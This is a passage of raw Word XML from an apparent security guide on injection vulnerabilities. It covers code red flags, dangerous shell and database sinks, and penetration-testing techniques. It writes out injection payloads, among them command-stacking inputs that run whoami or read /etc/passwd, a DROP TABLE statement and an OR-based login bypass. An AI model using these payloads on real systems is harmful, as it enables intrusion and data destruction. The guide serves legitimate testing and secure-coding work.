    <w:p w14:paraId="5608FC9A"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Red Flag Patterns &amp; Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF82B4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Raw String Concatenation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for string builders or plus operators formatting execution commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D5F64E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>"... WHERE id = " + input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B56C9AE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>C++ / C#:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>String.Format</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>("ping {0}", input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83ECA8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Bypassing the ORM:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In frameworks like Hibernate or Entity Framework, watch for developers bypassing safe methods to write native, unparameterized queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AC335" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>session.createNativeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>vulnerableString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or raw </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>HQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> concatenation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFA610"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Vulnerable Low-Level Sinks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63529D89"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Look for functions that pass strings directly to underlying OS shells or databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737275EB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>().exec()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>ProcessBuilder.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Statement.executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as opposed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922C0D2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>C / C++:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>CreateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BE2ED" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>subprocess.Popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>(shell=True)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D5F23" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>3. Penetration Testing (Black-Box &amp; Gray-Box Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02478EAC"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Penetration testers use targeted manipulation tactics on a live interface to force the application to break its execution logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E38FE81"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Input Manipulation &amp; Triage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88602D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>' "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DE697F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Breaking the Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testers append a single quote ( ), double quote ( ), or parenthesis ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to input parameters. The goal is to see if an unhandled backend error occurs, proving the character was interpreted as code, not data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64823475" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Stacking Commands:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In command or SQL injection, testers use command separators to append a secondary malicious action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72234823" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>127.0.0.1 ; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E936C89" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Server:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>101; DROP TABLE users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B7AD7F"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Logical Modification (Boolean Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09879FEE"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Testers attempt to subvert the developer's intended logic by turning conditional clauses into absolute truths or falsehoods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F292E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Submitting </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>test' OR 'a'='a</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to bypass a login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB9AA2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
